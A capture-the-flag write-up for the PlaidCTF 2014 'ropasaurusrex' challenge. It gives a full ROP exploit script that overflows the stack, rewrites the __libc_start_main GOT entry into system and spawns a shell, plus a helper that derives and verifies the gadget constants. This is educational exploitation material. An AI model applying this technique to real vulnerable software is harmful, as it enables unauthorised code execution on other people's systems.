Ropasaurusrex (plaidctf-2014)

This is one of the best binary problems I have solved. I solved it about a year ago but forgot to write it up.

The problem is about bypassing ASLR by overwriting a GOT entry. The binary is not PIE, so the address of the GOT slot holding __libc_start_main is fixed, and while ASLR randomises where libc is loaded, the distance between __libc_start_main and system inside libc is constant. Adding that distance to the already-resolved GOT slot turns it into a pointer to system without needing any information leak.

Since many writeups already explain this problem, I am not going to describe the whole exploit; the commented script below is enough to follow it.

from pwn import *
import sys

# Usage:
#   python exploit.py > inp
#   (cat inp /dev/stdin) | ./ropasaurusrex
# Feeding /dev/stdin after the payload keeps the pipe open so the spawned
# shell still receives our commands.

# The binary is not PIE: the GOT slot for __libc_start_main is at a fixed address.
got_libc_start_main = 0x08049618

# libc addresses seen in one run. ASLR moves both, but their distance
# (system - __libc_start_main = 0x26800) is fixed for this libc build.
libc_start_main = 0xf7e22990
system          = 0xf7e49190

# Gadgets in the binary:
#   0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret
#   0x080483bb: xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret
pop4_ret   = 0x080484b5
add_gadget = 0x080483bb

# ebx + 0x5D5B04C4 must wrap (mod 2^32) to the GOT slot:
# 0xaaa99154 + 0x5D5B04C4 = 0x1_08049618 -> 0x08049618
ebx_value = 0xaaa99154

# esi becomes eax via the xchg (eax held read()'s byte count, which we discard).
# "add al, 0x08" only changes the low byte: 0xf8 + 8 wraps to 0x00 without
# carrying into ah, so eax ends up as 0x26800, exactly system - __libc_start_main.
esi_value = 0x268f8

# 0x0804835c looks like the "call __libc_start_main@plt" in _start (the writeup
# only records the address). The call pushes a return address, so when the
# patched GOT slot lands in system(), the next dword we supply sits in the
# first-argument position.
call_libc_start_main = 0x0804835c
sh_addr = 0x0804867f   # address of the string "sh" inside the binary

payload  = b"A" * 140              # padding up to the saved return address
payload += p32(pop4_ret)
payload += p32(ebx_value)          # ebx
payload += p32(esi_value)          # esi
payload += p32(0xdeedbeef)         # edi (unused)
payload += p32(0xcafebabe)         # ebp (unused)
payload += p32(add_gadget)         # GOT[__libc_start_main] += 0x26800 -> system
payload += p32(call_libc_start_main)
payload += p32(sh_addr)            # system("sh")

sys.stdout.buffer.write(payload)
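The two magic constants in the chain (0xaaa99154 for ebx and 0x268f8 for esi) are the interesting part of this exploit: one has to survive a 32-bit wrap through the gadget's fixed displacement, the other an 8-bit `add al` that must not carry into the upper bytes. The helper below is an added example, not code from the original writeup; it derives both constants from the GOT address and the two libc addresses recorded in the comments above, builds the same payload with plain `struct` (no pwntools), and runs a tiny hypothetical model of the two gadgets to confirm the GOT slot ends up holding the address of system. It also generalises to the case where system sits below __libc_start_main, since the 32-bit add wraps either way.

```python
import struct

MASK32 = 0xFFFFFFFF
GADGET_DISP = 0x5D5B04C4   # displacement in "add dword [ebx+0x5D5B04C4], eax"
AL_ADD = 0x08              # the "add al, 0x08" that runs before the memory add


def ebx_for_slot(slot):
    """ebx such that (ebx + GADGET_DISP) mod 2^32 == slot (the GOT entry to patch)."""
    return (slot - GADGET_DISP) & MASK32


def esi_for_delta(delta):
    """esi such that after 'xchg eax,esi ; add al,8' eax equals delta mod 2^32.

    'add al' only rewrites the low byte (no carry into ah), so choose the low
    byte independently and keep the upper 24 bits of delta unchanged.
    """
    delta &= MASK32
    low = (delta - AL_ADD) & 0xFF
    return (delta & 0xFFFFFF00) | low


def run_gadgets(eax, ebx, esi, mem):
    """Minimal model of the gadget at 0x080483bb (not a real CPU):
    xchg eax,esi ; add al,0x08 ; add dword [ebx+0x5D5B04C4], eax.
    mem is a dict of 32-bit words keyed by address. Returns the final eax."""
    eax, esi = esi, eax                                   # xchg eax, esi
    eax = (eax & 0xFFFFFF00) | ((eax + AL_ADD) & 0xFF)    # add al, 8 (8-bit only)
    target = (ebx + GADGET_DISP) & MASK32                 # effective address wraps
    mem[target] = (mem[target] + eax) & MASK32            # 32-bit memory add
    return eax


def simulate_got_patch(got_slot, libc_start_main, system, bytes_read):
    """State right after read() returns: eax = byte count, GOT slot already
    resolved to __libc_start_main. Returns the value left in the GOT slot."""
    mem = {got_slot: libc_start_main}
    delta = (system - libc_start_main) & MASK32
    run_gadgets(eax=bytes_read, ebx=ebx_for_slot(got_slot),
                esi=esi_for_delta(delta), mem=mem)
    return mem[got_slot]


def build_payload(pop4_ret, add_gadget, call_lsm_plt, sh_addr,
                  got_slot, libc_start_main, system, pad=140):
    """Assemble the same chain as the writeup: pad, pop4 gadget, its four
    pops (ebx, esi, edi, ebp), the add gadget, the call, and system's argument."""
    delta = (system - libc_start_main) & MASK32
    chain = [pop4_ret,
             ebx_for_slot(got_slot),   # ebx
             esi_for_delta(delta),     # esi
             0xDEEDBEEF,               # edi (unused)
             0xCAFEBABE,               # ebp (unused)
             add_gadget,
             call_lsm_plt,
             sh_addr]
    return b"A" * pad + b"".join(struct.pack("<I", v) for v in chain)


if __name__ == "__main__":
    # Constants as recorded in the writeup above.
    GOT, LSM, SYSTEM = 0x08049618, 0xF7E22990, 0xF7E49190
    p = build_payload(0x080484B5, 0x080483BB, 0x0804835C, 0x0804867F, GOT, LSM, SYSTEM)
    print("ebx = %#010x  esi = %#010x" % (ebx_for_slot(GOT), esi_for_delta(SYSTEM - LSM)))
    print("GOT after gadgets = %#010x (system = %#010x)" %
          (simulate_got_patch(GOT, LSM, SYSTEM, len(p)), SYSTEM))
```

Running the script with the writeup's addresses reproduces 0xaaa99154 and 0x268f8 and shows the slot ending at 0xf7e49190. The low-byte trick in `esi_for_delta` is what makes the otherwise awkward `add al, 0x08` harmless: any delta can be hit, because the byte that gets incremented is chosen after subtracting 8 modulo 256.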